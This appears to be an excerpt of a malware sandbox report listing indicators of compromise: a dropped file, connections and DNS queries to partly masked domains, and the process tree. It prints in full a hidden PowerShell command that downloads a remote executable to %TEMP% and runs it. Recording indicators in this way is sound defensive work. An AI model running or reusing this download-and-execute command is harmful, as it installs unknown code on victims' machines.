Technical Information
- http://vp##ro.ga/windows.exe as %temp%\process.exe
- %TEMP%\process.exe
- 'vp##ro.ga':80
- 'pa###bin.com':443
- 'pa###bin.com':443
- DNS ASK vp##ro.ga
- DNS ASK pa###bin.com
- '%TEMP%\process.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://vp##ro.ga/Windows.exe','%temp%\process.exe');Start-Process '%temp%\process.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\dw20.exe' -x -s 1380